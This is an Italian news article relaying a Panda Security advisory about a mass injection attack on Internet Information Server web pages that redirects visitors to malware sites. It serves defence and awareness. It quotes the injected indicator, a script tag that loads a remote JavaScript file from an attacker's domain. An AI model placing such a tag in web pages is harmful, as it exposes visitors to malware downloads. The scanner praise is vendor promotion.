Panda Security avverte: Webmaster, controllate le vostre pagine web!
I laboratori di Panda Security hanno scoperto che gli hacker stanno effettuando un attacco massiccio, facilitati da una vulnerabilità degli Internet Information Server che permette loro di modificare le pagine web. Il risultato è che gli utenti vengono reindirizzati a siti illegali progettati per installare il malware nei computer.
Negli ultimi giorni questo attacco ha colpito 282.000 pagine web, ma il dato potrebbe crescere drasticamente.
A causa di questo problema di sicurezza, i cyber criminali sono in grado di immettere il codice maligno SQL in tutte le pagine presenti in un server web. Questo codice è progettato per reindirizzare gli utenti delle pagine compromesse verso un sito illegale che analizza il sistema per trovare altre vulnerabilità che possano essere utilizzate per scaricare qualsiasi tipo di malware. La situazione è aggravata dal fatto che la maggior parte delle pagine colpite non mostrano elementi sospetti e sono visitate da un elevato numero di utenti.
Come accorgersi se una pagina web è stata manipolata
Panda Security consiglia a tutti i webmaster che gestiscono pagine web, che appoggiano ad un Internet Information Server, di controllare al più presto che queste non siano state colpite.
La procedura da seguire è semplice, poiché si tratta di cercare uno specifico string code nei codici fonte della pagina, associato ad un tag IFRAME. Lo string è:
<script src=http://www.nihaorr1.com/1.js>
Se lo si individua, occorre eliminarlo immediatamente e avvisare i responsabili della gestione del server nel quale alloggia la pagina, per permettere loro di applicare le corrispondenti misure di sicurezza.
Dato il gran numero di pagine infettate, molti utenti potrebbero essere stati colpiti da ogni tipo di codice maligno, compresi nuovi esemplari non ancora identificati dalle aziende che si occupano di sicurezza. Per verificare se il sistema è stato compromesso, Panda Security consiglia agli utenti di connettersi a http://www.infectedornot.com ed effettuare la scansione gratuita del PC tramite lo scanner online ActiveScan 2.0, una soluzione di sicurezza che opera basandosi sull’Intelligenza Collettiva ed è in grado di individuare molte più minacce rispetto alle altre.
Da FullPress.it
Oppure abbonati alla newsletter (servizio gestito da FeedBurner/Google):
Trackback URL.
POST CORRELATI
- Panda Security avverte: false pagine di YouTube infettano i PC degli utenti
- Panda Security avverte: una vulnerabilità di Adobe Flash viene utilizzata per diffondere il malware
- La nuova versione di Panda Security for Exchange Server per la protezione delle email aziendali è compatibile con Exchange 2010
- Olidata e Panda Security insieme per la protezione dei più piccoli
- Le soluzioni Panda GateDefender Integra e Panda Security for Business premiate con le 5 stelle di SC Magazine
- Panda Security partecipa a ICT Trade 2010
- Panda Security: Barack Obama si ritira. Parola di malware
- Panda Security ha scoperto un falso Facebook
- Riconoscimenti internazionali per le soluzioni corporate di Panda Security
